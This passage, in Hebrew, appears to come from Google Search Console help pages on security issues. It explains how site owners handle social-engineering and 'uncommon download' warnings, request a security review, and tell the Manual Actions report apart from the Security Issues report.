יש לפתור את הבעיות בכל הדפים שמיישמים הנדסה חברתית. אם לדעתכם האתר שלכם נפרץ, ניתן לעיין במדריך העזרה לאתרים שנפרצו. אם אתם סבורים ששירות הגלישה הבטוחה סיווג דף אינטרנט באופן שגוי, יש לדווח על כך כאן.3. מבקשים בדיקה
אחרי שאישרתם שהבעיה תוקנה באתר, תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת הבדיקה יכולה להימשך מספר ימים עד שבועות.
הורדות לא שגרתיות
האתר שלכם מציע הורדה שלא מוכרת לשירות גלישה בטוחה של Google. ייתכן שדפדפן Chrome יזהיר שמדובר בהורדה לא נפוצה והיא עלולה להיות מסוכנת. אזהרות אלה מוסרות אוטומטית אם שירות הגלישה הבטוחה של Google מאמת שהקבצים בטוחים. הערה: לא תמיד ניתנות דוגמאות של כתובות URL לבעיה הזאת.
בעיה זו לא תמנע הופעה של הדף או האתר שלכם בתוצאות חיפוש Google, אבל תוצג אזהרה בדפדפן Chrome כשמשתמש יבקש בפעם הראשונה להוריד קבצים לא מוכרים.
1. פותרים את הבעיה
מוצאים את ההורדות שלכם ומוודאים שהן תואמות להנחיות בנושא הורדות.
- אם אחת ההורדות באתר שלכם מפרה את ההנחיות, יש להסיר אותה.
- אם הורדות לא מפרות את ההנחיות, אין צורך להסיר אותן.
2. מבקשים בדיקה
כשאתם מסיימים להסיר קבצים (או מסיימים לאמת שההורדות שלכם תואמות להנחיות), תוכלו לבקש בדיקת אבטחה בדוח 'בעיות אבטחה'. השלמת בדיקה יכולה לארוך מספר ימים עד מספר שבועות. גם אם לא מבקשים בדיקה, בסופו של דבר Google תבצע הערכה לרוב ההורדות ותסווג אותן כתקינות או כמזיקות. עם זאת, שליחת בקשת בדיקה יכולה להאיץ את תהליך ההערכה.
מה ההבדל בין דוח הפעולות הידניות לבין דוח בעיות האבטחה?
בדוח הפעולות הידניות מפורטות בעיות בדף או באתר, שקשורות לניסיון לתמרן את אינדקס החיפוש שלנו. בעיות אלה אינן בהכרח מסוכנות למשתמשים. רוב הבעיות שמדווחות כאן יובילו לכך שהאתר או הדפים יקבלו דירוג נמוך או יושמטו מתוצאות החיפוש בלי שהמשתמשים יראו אינדיקציה ויזואלית לכך.
דוח בעיות האבטחה מפרט סימנים לכך שהאתר נפרץ, או מפרט התנהגות באתר שעלולה להזיק למבקרים או למחשבים שלהם: למשל, התקפות דיוג או התקנת תוכנה זדונית או תוכנות לא רצויות במחשב המשתמש. דפים אלה יכולים להופיע עם תווית אזהרה בתוצאות החיפוש, או שדפדפן עשוי להציג דף ביניים המכיל אזהרה כאשר המשתמש מנסה להיכנס אליהם.
